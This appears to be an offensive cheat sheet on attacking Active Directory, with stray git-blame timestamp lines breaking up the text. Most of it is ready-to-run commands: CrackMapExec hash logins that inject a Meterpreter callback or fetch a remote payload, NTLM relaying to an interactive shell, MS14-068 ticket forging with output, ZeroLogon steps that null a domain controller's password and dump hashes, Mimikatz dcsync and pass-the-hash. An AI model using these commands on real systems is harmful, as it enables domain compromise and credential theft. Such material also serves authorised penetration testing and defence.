2018-03-12 08:17:31 +00:00
# Active Directory Attacks
2018-05-05 15:41:04 +00:00
## Summary
2018-08-12 21:30:22 +00:00
2019-11-16 13:53:42 +00:00
- [Active Directory Attacks ](#active-directory-attacks )
- [Summary ](#summary )
- [Tools ](#tools )
2020-12-02 17:43:13 +00:00
- [Active Directory Recon ](#active-directory-recon )
- [Using BloodHound ](#using-bloodhound )
- [Using PowerView ](#using-powerview )
- [Using AD Module ](#using-ad-module )
2019-11-16 13:53:42 +00:00
- [Most common paths to AD compromise ](#most-common-paths-to-ad-compromise )
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) ](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability )
2021-07-01 12:40:03 +00:00
- [From CVE to SYSTEM shell on DC ](#from-cve-to-system-shell-on-dc )
2021-07-12 12:42:18 +00:00
- [ZeroLogon ](#zerologon )
- [PrintNightmare ](#printnightmare )
2019-11-16 13:53:42 +00:00
- [Open Shares ](#open-shares )
- [SCF and URL file attack against writeable share ](#scf-and-url-file-attack-against-writeable-share )
2021-09-01 12:10:53 +00:00
- [SCF Files ](#scf-files )
- [URL Files ](#url-files )
- [Windows Library Files ](#windows-library-files )
- [Windows Search Connectors Files ](#windows-search-connectors-files )
2019-12-26 11:09:23 +00:00
- [Passwords in SYSVOL & Group Policy Preferences ](#passwords-in-sysvol-&-group-policy-preferences )
2020-01-05 15:28:00 +00:00
- [Exploit Group Policy Objects GPO ](#exploit-group-policy-objects-gpo )
2021-01-29 21:10:22 +00:00
- [Find vulnerable GPO ](#find-vulnerable-gpo )
- [Abuse GPO with SharpGPOAbuse ](#abuse-gpo-with-sharpgpoabuse )
- [Abuse GPO with PowerGPOAbuse ](#abuse-gpo-with-powergpoabuse )
- [Abuse GPO with pyGPOAbuse ](#abuse-gpo-with-pygpoabuse )
- [Abuse GPO with PowerView ](#abuse-gpo-with-powerview )
2021-06-28 20:08:06 +00:00
- [Abuse GPO with StandIn ](#abuse-gpo-with-standin )
2019-11-25 22:35:20 +00:00
- [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials )
2019-11-16 13:53:42 +00:00
- [Using ndtsutil ](#using-ndtsutil )
- [Using Vshadow ](#using-vshadow )
- [Using vssadmin ](#using-vssadmin )
- [Using DiskShadow (a Windows signed binary) ](#using-diskshadow-a-windows-signed-binary )
- [Using esentutl.exe ](#using-esentutlexe )
- [Extract hashes from ntds.dit ](#extract-hashes-from-ntdsdit )
- [Alternatives - modules ](#alternatives---modules )
- [Using Mimikatz DCSync ](#using-mimikatz-dcsync )
- [Using Mimikatz sekurlsa ](#using-mimikatz-sekurlsa )
- [Password spraying ](#password-spraying )
2019-11-25 22:35:20 +00:00
- [Kerberos pre-auth bruteforcing ](#kerberos-pre-auth-bruteforcing )
- [Spray a pre-generated passwords list ](#spray-a-pre-generated-passwords-list )
- [Spray passwords against the RDP service ](#spray-passwords-against-the-rdp-service )
2021-06-28 20:08:06 +00:00
- [BadPwdCount attribute ](#badpwdcount-attribute )
2019-11-16 13:53:42 +00:00
- [Password in AD User comment ](#password-in-ad-user-comment )
2020-12-20 20:45:41 +00:00
- [Reading LAPS Password ](#reading-laps-password )
2021-03-24 11:44:35 +00:00
- [Reading GMSA Password ](#reading-gmsa-password )
2019-11-16 13:53:42 +00:00
- [Pass-the-Ticket Golden Tickets ](#pass-the-ticket-golden-tickets )
- [Using Mimikatz ](#using-mimikatz )
- [Using Meterpreter ](#using-meterpreter )
- [Using a ticket on Linux ](#using-a-ticket-on-linux )
- [Pass-the-Ticket Silver Tickets ](#pass-the-ticket-silver-tickets )
- [Kerberoasting ](#kerberoasting )
- [KRB_AS_REP Roasting ](#krbasrep-roasting )
2021-06-24 13:26:05 +00:00
- [Shadow Credentials ](#shadow-credentials )
2019-11-16 13:53:42 +00:00
- [Pass-the-Hash ](#pass-the-hash )
- [OverPass-the-Hash (pass the key) ](#overpass-the-hash-pass-the-key )
- [Using impacket ](#using-impacket )
- [Using Rubeus ](#using-rubeus )
2021-09-06 18:58:44 +00:00
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes ](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes )
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes ](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes )
2021-03-25 17:25:02 +00:00
- [Man-in-the-Middle attacks & relaying ](#man-in-the-middle-attacks--relaying )
2019-11-16 13:53:42 +00:00
- [MS08-068 NTLM reflection ](#ms08-068-ntlm-reflection )
- [SMB Signing Disabled and IPv4 ](#smb-signing-disabled-and-ipv4 )
- [SMB Signing Disabled and IPv6 ](#smb-signing-disabled-and-ipv6 )
- [Drop the MIC ](#drop-the-mic )
- [Ghost Potato - CVE-2019-1384 ](#ghost-potato---cve-2019-1384 )
2021-07-26 19:25:56 +00:00
- [RemotePotato0 DCOM DCE RPC relay ](#remotepotato0-dcom-dce-rpc-relay )
2021-08-25 20:14:44 +00:00
- [Relay delegation with mitm6 ](#relay-delegation-with-mitm6 )
- [Active Directory Certificate Services ](#active-directory-certificate-services )
- [ESC1 - Misconfigured Certificate Templates ](#esc1---misconfigured-certificate-templates )
2021-09-01 12:10:53 +00:00
- [ESC2 - Misconfigured Certificate Templates ](#esc2---misconfigured-certificate-templates )
2021-08-25 20:14:44 +00:00
- [ESC8 - AD CS Relay Attack ](#esc8---ad-cs-relay-attack )
2019-11-16 13:53:42 +00:00
- [Dangerous Built-in Groups Usage ](#dangerous-built-in-groups-usage )
2020-01-02 22:33:04 +00:00
- [Abusing Active Directory ACLs/ACEs ](#abusing-active-directory-aclsaces )
2020-05-03 14:28:17 +00:00
- [GenericAll ](#genericall )
- [GenericWrite ](#genericwrite )
2020-08-17 13:00:04 +00:00
- [GenericWrite and Remote Connection Manager ](#genericwrite-and-remote-connection-manager )
2020-05-03 14:28:17 +00:00
- [WriteDACL ](#writedacl )
2020-09-18 19:21:55 +00:00
- [WriteOwner ](#writeowner )
- [ReadLAPSPassword ](#readlapspassword )
- [ReadGMSAPassword ](#readgmsapassword )
- [ForceChangePassword ](#forcechangepassword )
2021-03-24 21:26:23 +00:00
- [DCOM Exploitation ](#dcom-exploitation )
- [DCOM via MMC Application Class ](#dcom-via-mmc-application-class )
- [DCOM via Excel ](#dcom-via-excel )
- [DCOM via ShellExecute ](#dcom-via-shellexecute )
2019-11-16 13:53:42 +00:00
- [Trust relationship between domains ](#trust-relationship-between-domains )
- [Child Domain to Forest Compromise - SID Hijacking ](#child-domain-to-forest-compromise---sid-hijacking )
2020-08-18 07:33:38 +00:00
- [Forest to Forest Compromise - Trust Ticket ](#forest-to-forest-compromise---trust-ticket )
2020-01-05 15:28:00 +00:00
- [Kerberos Unconstrained Delegation ](#kerberos-unconstrained-delegation )
2021-08-10 21:00:19 +00:00
- [SpoolService Abuse with Unconstrained Delegation ](#spoolservice-abuse-with-unconstrained-delegation )
- [MS-EFSRPC Abuse with Unconstrained Delegation ](#ms---efsrpc-abuse-with-unconstrained-delegation )
2020-02-23 20:20:46 +00:00
- [Kerberos Constrained Delegation ](#kerberos-constrained-delegation )
2020-01-05 15:28:00 +00:00
- [Kerberos Resource Based Constrained Delegation ](#kerberos-resource-based-constrained-delegation )
2020-12-18 21:38:30 +00:00
- [Kerberos Bronze Bit Attack - CVE-2020-17049 ](#kerberos-bronze-bit-attack---cve-2020-17049 )
2019-11-16 13:53:42 +00:00
- [PrivExchange attack ](#privexchange-attack )
- [PXE Boot image attack ](#pxe-boot-image-attack )
2021-01-08 22:41:50 +00:00
- [DSRM Credentials ](#dsrm-credentials )
2021-06-28 20:08:06 +00:00
- [DNS Reconnaissance ](#dns-reconnaissance )
2019-11-16 13:53:42 +00:00
- [Impersonating Office 365 Users on Azure AD Connect ](#impersonating-office-365-users-on-azure-ad-connect )
2019-11-25 22:12:06 +00:00
- [Linux Active Directory ](#linux-active-directory )
- [CCACHE ticket reuse from /tmp ](#ccache-ticket-reuse-from-tmp )
- [CCACHE ticket reuse from keyring ](#ccache-ticket-reuse-from-keyring )
2021-06-24 13:26:05 +00:00
- [CCACHE ticket reuse from SSSD KCM ](#ccache-ticket-reuse-from-sssd-kcm )
2019-11-25 22:12:06 +00:00
- [CCACHE ticket reuse from keytab ](#ccache-ticket-reuse-from-keytab )
- [Extract accounts from /etc/krb5.keytab ](#extract-accounts-from-etckrb5keytab )
2019-11-16 13:53:42 +00:00
- [References ](#references )
2018-05-05 15:41:04 +00:00
2018-05-05 15:32:19 +00:00
## Tools
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
* [Impacket ](https://github.com/CoreSecurity/impacket ) or the [Windows version ](https://github.com/maaaaz/impacket-examples-windows )
2020-10-02 04:39:09 +00:00
* [Responder ](https://github.com/lgandx/Responder )
* [InveighZero ](https://github.com/Kevin-Robertson/InveighZero )
2018-05-05 15:32:19 +00:00
* [Mimikatz ](https://github.com/gentilkiwi/mimikatz )
* [Ranger ](https://github.com/funkandwagnalls/ranger )
* [AdExplorer ](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer )
* [CrackMapExec ](https://github.com/byt3bl33d3r/CrackMapExec )
2018-08-12 21:30:22 +00:00
2020-05-03 14:28:17 +00:00
```powershell
# use the latest release, CME is now a binary packaged will all its dependencies
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip
# execute cme (smb, winrm, mssql, ...)
root@payload$ cme smb -L
root@payload$ cme smb -M name_module -o VAR=DATA
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
root@payload$ cme mimikatz --server http --server-port 80
2018-08-12 21:30:22 +00:00
```
2019-04-21 12:08:18 +00:00
* [Mitm6 ](https://github.com/fox-it/mitm6.git )
```bash
git clone https://github.com/fox-it/mitm6.git & & cd mitm6
pip install .
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’ s IP)
# -t: Target (You cannot relay credentials to the same device that you’ re spoofing)
# -i: open an interactive shell
2020-01-19 21:46:45 +00:00
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
2019-04-21 12:08:18 +00:00
```
2019-11-26 22:39:14 +00:00
* [ADRecon ](https://github.com/sense-of-security/ADRecon )
```powershell
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
```
2018-05-20 20:10:33 +00:00
* [Active Directory Assessment and Privilege Escalation Script ](https://github.com/hausec/ADAPE-Script )
2019-03-24 15:00:27 +00:00
```powershell
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
```
2019-02-17 19:02:16 +00:00
* [Ping Castle ](https://github.com/vletoux/pingcastle )
```powershell
pingcastle.exe --healthcheck --server < DOMAIN_CONTROLLER_IP > --user < USERNAME > --password < PASSWORD > --advanced-live --nullsession
2019-08-03 21:22:14 +00:00
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
2019-02-17 19:02:16 +00:00
```
2018-05-05 15:32:19 +00:00
2019-03-24 12:16:23 +00:00
* [Kerbrute ](https://github.com/ropnop/kerbrute )
```powershell
./kerbrute passwordspray -d < DOMAIN > < USERS.TXT > < PASSWORD >
```
2019-07-22 19:45:50 +00:00
* [Rubeus ](https://github.com/GhostPack/Rubeus )
```powershell
Rubeus.exe asktgt /user:USER < /password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid]
Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID]
Rubeus.exe klist [/luid:LOGINID]
Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
```
2019-11-04 20:43:44 +00:00
* [AutomatedLab ](https://github.com/AutomatedLab/AutomatedLab )
```powershell
New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV
Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD'
Install-Lab
Show-LabDeploymentSummary
```
2019-07-22 19:45:50 +00:00
2020-12-02 17:43:13 +00:00
## Active Directory Recon
### Using BloodHound
Use the correct collector
* AzureHound for Azure Active Directory
* SharpHound for local Active Directory
use [AzureHound ](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350 )
```powershell
# require: Install-Module -name Az -AllowClobber
# require: Install-Module -name AzureADPreview -AllowClobber
Connect-AzureAD
Connect-AzAccount
. .\AzureHound.ps1
Invoke-AzureHound
```
use [BloodHound ](https://github.com/BloodHoundAD/BloodHound )
```powershell
# run the collector on the machine using SharpHound.exe
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
2021-02-26 13:14:10 +00:00
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
2020-12-02 17:43:13 +00:00
.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
2021-03-24 11:44:35 +00:00
.\SharpHound.exe -c all,GPOLocalGroup
2021-03-24 21:26:23 +00:00
.\SharpHound.exe -c all --LdapUsername < UserName > --LdapPassword < Password > --JSONFolder < PathToFile >
.\SharpHound.exe -c all -d active.htb --LdapUsername < UserName > --LdapPassword < Password > --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
2020-12-02 17:43:13 +00:00
# or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
2021-02-26 13:14:10 +00:00
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
2020-12-02 17:43:13 +00:00
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
Invoke-BloodHound -CollectionMethod All -LDAPUser < UserName > -LDAPPass < Password > -OutputDirectory < PathToFile >
# or remotely via BloodHound Python
# https://github.com/fox-it/BloodHound.py
pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
```
Then import the zip/json files into the Neo4J database and query them.
```powershell
root@payload$ apt install bloodhound
# start BloodHound and the database
root@payload$ neo4j console
2021-03-24 11:44:35 +00:00
# or use docker
root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j
2020-12-02 17:43:13 +00:00
root@payload$ ./bloodhound --no-sandbox
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
```
You can add some custom queries like [Bloodhound-Custom-Queries ](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json ) from @hausec . Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json` .
### Using PowerView
- **Get Current Domain:** `Get-NetDomain`
- **Enum Other Domains:** `Get-NetDomain -Domain <DomainName>`
- **Get Domain SID:** `Get-DomainSID`
- **Get Domain Policy:**
```
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
```
- **Get Domain Controlers:**
```
Get-NetDomainController
Get-NetDomainController -Domain < DomainName >
```
- **Enumerate Domain Users:**
```
Get-NetUser
Get-NetUser -SamAccountName < user >
Get-NetUser | select cn
Get-UserProperty
#Check last password change
Get-UserProperty -Properties pwdlastset
#Get a spesific "string" on a user's attribute
Find-UserField -SearchField Description -SearchTerm "wtver"
#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName < ComputerName >
#Enumerate Session Information for a machine
Get-NetSession -ComputerName < ComputerName >
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain < DomainName > | Select-Object UserName, SessionFromName
```
- **Enum Domain Computers:**
```
Get-NetComputer -FullData
Get-DomainGroup
#Enumerate Live machines
Get-NetComputer -Ping
```
- **Enum Groups and Group Members:**
```
Get-NetGroupMember -GroupName "< GroupName > " -Domain < DomainName >
#Enumerate the members of a specified group of the domain
Get-DomainGroup -Identity < GroupName > | Select-Object -ExpandProperty Member
#Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
```
- **Enumerate Shares**
```
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
```
- **Enum Group Policies:**
```
Get-NetGPO
# Shows active Policy on specified machine
Get-NetGPO -ComputerName < Name of the PC >
Get-NetGPOGroup
#Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName < ComputerName >
```
- **Enum OUs:**
```
Get-NetOU -FullData
Get-NetGPO -GPOname < The GUID of the GPO >
```
- **Enum ACLs:**
```
# Returns the ACLs associated with the specified account
Get-ObjectAcl -SamAccountName < AccountName > -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
#Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
```
- **Enum Domain Trust:**
```
Get-NetDomainTrust
Get-NetDomainTrust -Domain < DomainName >
```
- **Enum Forest Trust:**
```
Get-NetForestDomain
Get-NetForestDomain Forest < ForestName >
#Domains of Forest Enumeration
Get-NetForestDomain
Get-NetForestDomain Forest < ForestName >
#Map the Trust of the Forest
Get-NetForestTrust
Get-NetDomainTrust -Forest < ForestName >
```
- **User Hunting:**
```
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
#Confirming admin access:
Invoke-UserHunter -CheckAccess
```
:heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him ->
Profit!
[PowerView 3.0 Tricks ](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 )
### Using AD Module
- **Get Current Domain:** `Get-ADDomain`
- **Enum Other Domains:** `Get-ADDomain -Identity <Domain>`
- **Get Domain SID:** `Get-DomainSID`
- **Get Domain Controlers:**
```
Get-ADDomainController
Get-ADDomainController -Identity < DomainName >
```
- **Enumerate Domain Users:**
```
Get-ADUser -Filter * -Identity <user> -Properties *
#Get a spesific "string" on a user's attribute
Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
```
- **Enum Domain Computers:**
```
Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *
```
- **Enum Domain Trust:**
```
Get-ADTrust -Filter *
Get-ADTrust -Identity < DomainName >
```
- **Enum Forest Trust:**
```
Get-ADForest
Get-ADForest -Identity < ForestName >
#Domains of Forest Enumeration
(Get-ADForest).Domains
```
- **Enum Local AppLocker Effective Policy:**
```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```
2018-03-12 08:17:31 +00:00
## Most common paths to AD compromise
2018-05-05 15:32:19 +00:00
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
2018-08-12 21:30:22 +00:00
2019-06-29 15:55:13 +00:00
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
```powershell
# remote
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
# loc
wmic useraccount get name,sid
Administrator S-1-5-21-3415849876-833628785-5197346142-500
Guest S-1-5-21-3415849876-833628785-5197346142-501
Administrator S-1-5-21-297520375-2634728305-5197346142-500
Guest S-1-5-21-297520375-2634728305-5197346142-501
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
lambda S-1-5-21-297520375-2634728305-5197346142-1110
2019-11-05 10:05:59 +00:00
# powerview
Convert-NameToSid high-sec-corp.localkrbtgt
S-1-5-21-2941561648-383941485-1389968811-502
2019-06-29 15:55:13 +00:00
```
2018-05-05 15:32:19 +00:00
```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
2019-06-29 15:55:13 +00:00
```
Generate a ticket with `metasploit` or `pykek`
```powershell
2018-05-05 15:32:19 +00:00
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
2019-06-29 15:55:13 +00:00
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD P@ssw0rd yes The Domain User password
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER lambda yes The Domain User
USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
```
2018-05-05 15:32:19 +00:00
2019-06-29 15:55:13 +00:00
```powershell
2019-12-26 11:09:23 +00:00
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u < userName > @< domainName > -s < userSid > -d < domainControlerAddr > -p < clearPassword >
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
2019-06-29 15:55:13 +00:00
```
Then use `mimikatz` to load the ticket.
```powershell
2018-05-05 15:32:19 +00:00
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
2019-06-29 15:55:13 +00:00
:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
```powershell
2019-08-15 16:21:06 +00:00
Linux> $ nmap -sV -sC 10.10.10.10
2019-06-29 15:55:13 +00:00
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
2019-08-15 16:21:06 +00:00
Linux> sudo date -s "14 APR 2015 18:25:16"
Windows> net time /domain /set
2019-06-29 15:55:13 +00:00
```
2019-12-26 11:09:23 +00:00
#### Mitigations
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
2021-07-01 12:40:03 +00:00
### From CVE to SYSTEM shell on DC
> Sometimes you will find a Domain Controller without the latest patches installed, use the newest CVE to gain a SYSTEM shell on it. If you have a "normal user" shell on the DC you can also try to elevate your privileges using one of the methods listed in [Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
2021-07-12 12:42:18 +00:00
#### ZeroLogon
> CVE-2020-1472
2020-09-14 21:06:09 +00:00
White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055
Exploit steps from the white paper
1. Spoofing the client credential
2. Disabling signing and sealing
3. Spoofing a call
2020-09-17 12:05:54 +00:00
4. Changing a computer's AD password to null
2020-09-14 21:06:09 +00:00
5. From password change to domain admin
2020-09-17 12:05:54 +00:00
6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service
2020-09-14 21:06:09 +00:00
2021-04-21 20:27:07 +00:00
* `cve-2020-1472-exploit.py` - Python script from dirkjanm
```powershell
2021-09-30 21:38:48 +00:00
# Check (https://github.com/SecuraBV/CVE-2020-1472)
proxychains python3 zerologon_tester.py DC01 172.16.1.5
2021-04-21 20:27:07 +00:00
$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
2020-09-18 19:21:55 +00:00
2021-04-21 20:27:07 +00:00
# Activate a virtual env to install impacket
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install .
2021-09-30 21:38:48 +00:00
2021-04-21 20:27:07 +00:00
# Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py)
proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
2020-09-14 21:06:09 +00:00
2021-04-21 20:27:07 +00:00
# Find the old NT hash of the DC
proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
2020-09-16 12:31:59 +00:00
2021-04-21 20:27:07 +00:00
# Restore password from secretsdump
# secretsdump will automatically dump the plaintext machine password (hex encoded)
# when dumping the local registry secrets on the newest version
python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
deactivate
```
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly
```powershell
git clone https://github.com/nccgroup/nccfsas
# Check
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Resetting the machine account password
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Testing from a non Domain-joined machine
execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
2020-09-16 12:31:59 +00:00
2021-04-21 20:27:07 +00:00
# Now reset the password back
```
2020-09-16 12:13:40 +00:00
2021-04-21 20:27:07 +00:00
* `Mimikatz` - 2.2.0 20200917 Post-Zerologon
```powershell
privilege::debug
# Check for the CVE
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Exploit the CVE and set the computer account's password to ""
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Execute dcsync to extract some hashes
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Pass The Hash with the extracted Domain Admin hash
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
2020-09-17 12:05:54 +00:00
2021-04-21 20:27:07 +00:00
# Use IP address instead of FQDN to force NTLM with Windows APIs
# Reset password to Waza1234/Waza1234/Waza1234/
# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
```
2019-12-26 11:09:23 +00:00
2021-07-12 12:42:18 +00:00
#### PrintNightmare
> CVE-2021-1675 / CVE-2021-34527
2021-07-01 12:40:03 +00:00
The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\` .
2021-07-04 11:32:32 +00:00
The exploit will execute the DLL either from the local filesystem or a remote share.
Requirements:
* **Spooler Service** enabled (Mandatory)
* Server with patches < June 21
* DC with `Pre Windows 2000 Compatibility` group
* Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1
